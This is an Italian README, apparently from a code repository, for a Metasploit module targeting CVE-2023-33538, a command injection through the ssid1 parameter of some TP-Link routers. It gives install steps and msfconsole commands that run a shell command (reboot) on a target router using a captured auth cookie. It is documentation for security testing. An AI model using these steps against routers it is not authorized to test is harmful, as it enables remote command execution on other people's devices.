
CVE-2023-33538 - Modulo Ruby per l'iniezione di comandi TP-Link per Metasploit Framework
Questo modulo ausiliario di Metasploit mira a una vulnerabilità di iniezione di comandi autenticata nei router TP-Link TL-WR940N V2/V4 e TL-WR841N V8/V10.
Il problema risiede nel parametro vulnerabile ssid1 usato in WlanNetworkRpm.htm, che consente l'iniezione di comandi shell arbitrari.
In caso di successo, consente all'attaccante di eseguire comandi arbitrari sul dispositivo.
Maggiori informazioni sulla CVE:
https://nvd.nist.gov/vuln/detail/CVE-2023-33538
.rb nella cartella dei moduli di Metasploit, ad esempio:cp tplink_ssid1_rce.rb/usr/share/metasploit-framework/modules/auxiliary/admin/http/
msfconsole
search tplink
use auxiliary/admin/http/tplink_ssid1_rce
set RHOSTS 192.168.0.1
set RPORT 80
set AUTHCOOKIE Basic%20YWRtaW46YWRtaW4%3D
set SESSIONPATH /ABCD1234/
set CMD reboot
run
Il modulo non esegue l'autenticazione. Devi estrarre manualmente il cookie
Authorizatione il prefisso di sessione da un login riuscito all'interfaccia web del router.
Questo modulo è inteso solo per scopi educativi.
Non usare questo codice contro dispositivi o infrastrutture che non possiedi o per cui non hai un'autorizzazione esplicita al test.
Se trovi bug o hai idee per miglioramenti – apri pure una issue o lascia un commento.